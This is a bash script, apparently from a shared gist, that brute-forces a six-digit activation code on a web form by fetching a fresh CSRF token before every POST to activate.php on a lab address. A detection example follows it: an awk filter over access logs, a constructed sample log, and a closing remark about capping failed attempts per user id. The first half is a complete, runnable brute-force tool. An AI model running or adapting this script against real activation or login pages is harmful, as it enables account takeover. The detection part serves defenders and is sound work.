brute_onepass_for_csrf_Token.sh
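#!/bin/bash
# Brute-forces the 6-digit activation code for a user id on a form that
# requires a fresh CSRF token with every POST.
# Usage: ./brute_onepass_for_csrf_Token.sh <userid>

HOST=192.168.10.130
ACTIVATE=activate.php
ME=$(basename "$0")

# Fetch page $1 and print the CSRF token embedded in it.
# The first call creates the cookie jar (-c); later calls send it back (-b).
function token() {
    local COOKIE=""
    if [ -e cookie ]; then
        COOKIE="-b cookie"
    else
        COOKIE="-c cookie"
    fi
    # $COOKIE is left unquoted on purpose so it splits into flag + file name.
    curl \
        -s \
        $COOKIE \
        "http://$HOST/$1" 2>/dev/null \
        | grep -m1 token \
        | cut -d"'" -f6
}

# POST userid ($1) and activation code ($2) with a freshly fetched token.
# Prints only the HTTP status code of the response.
function activate() {
    curl \
        -s \
        -b cookie \
        -w '%{http_code}' \
        -o /dev/null \
        --data-urlencode "userid=$1" \
        --data-urlencode "activation_code=$2" \
        --data-urlencode "token=$(token "$ACTIVATE")" \
        "http://$HOST/$ACTIVATE"
}

# Remove the cookie jar and kill every process matching this script's name,
# including the running one.
function die() {
    rm -f cookie
    for pid in $(ps aux \
        | grep -v grep \
        | grep "$ME" \
        | awk '{ print $2 }'); do
        kill -9 "$pid" &>/dev/null
    done
}

# activation
# Any status other than 403 is treated as a hit.
# activate() ignores the third argument and fetches its own token.
for pin in {000000..999999}; do
    if [ "$(activate "$1" "$pin" "$(token "$ACTIVATE")")" -ne 403 ]; then
        echo "[+] uid: $1, pin: $pin"
        die
    fi
done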
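
Because the script fetches a fresh token before every POST, the CSRF token does nothing to slow the guessing; on the server side the loop appears as one client alternating token fetches with 403 responses from activate.php. The detection sketch below is an added example, not part of the gist. It assumes a combined-format access log and that a wrong code returns 403 (the status the script treats as failure); the function names, threshold and log lines are constructed for illustration.

```shell
#!/bin/bash
# Added example: flag clients that rack up failed activation attempts.
# Assumptions: combined-format access log; a wrong code yields HTTP 403
# (the status the script above treats as failure).

# Usage: flag_activation_bruteforce THRESHOLD < access.log
# Prints "ip failed_posts token_fetches" for every client at or over THRESHOLD.
flag_activation_bruteforce() {
    awk -v limit="$1" '
        # $1=client ip, $6="METHOD (with leading quote), $7=path, $9=status
        $7 ~ /^\/activate\.php(\?|$)/ {
            method = substr($6, 2)
            if (method == "POST" && $9 == 403) failed[$1]++
            else if (method == "GET")          fetched[$1]++
        }
        END {
            for (ip in failed)
                if (failed[ip] >= limit)
                    printf "%s %d %d\n", ip, failed[ip], fetched[ip]
        }
    ' | sort
}

# Constructed sample log (documentation address ranges, not real traffic).
sample_log() {
    local i
    for i in 1 2 3 4 5; do
        echo "198.51.100.7 - - [01/Jan/2024:10:00:0$i +0000] \"GET /activate.php HTTP/1.1\" 200 512 \"-\" \"curl/8.0\""
        echo "198.51.100.7 - - [01/Jan/2024:10:00:0$i +0000] \"POST /activate.php HTTP/1.1\" 403 128 \"-\" \"curl/8.0\""
    done
    # A legitimate user who mistypes the code once, then succeeds.
    echo '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /activate.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
    echo '192.0.2.10 - - [01/Jan/2024:10:01:09 +0000] "POST /activate.php HTTP/1.1" 403 128 "-" "Mozilla/5.0"'
    echo '192.0.2.10 - - [01/Jan/2024:10:01:30 +0000] "POST /activate.php HTTP/1.1" 200 256 "-" "Mozilla/5.0"'
}

sample_log | flag_activation_bruteforce 3
```

A per-userid cap on failed activation attempts, enforced by the application, closes the gap that this log check only observes.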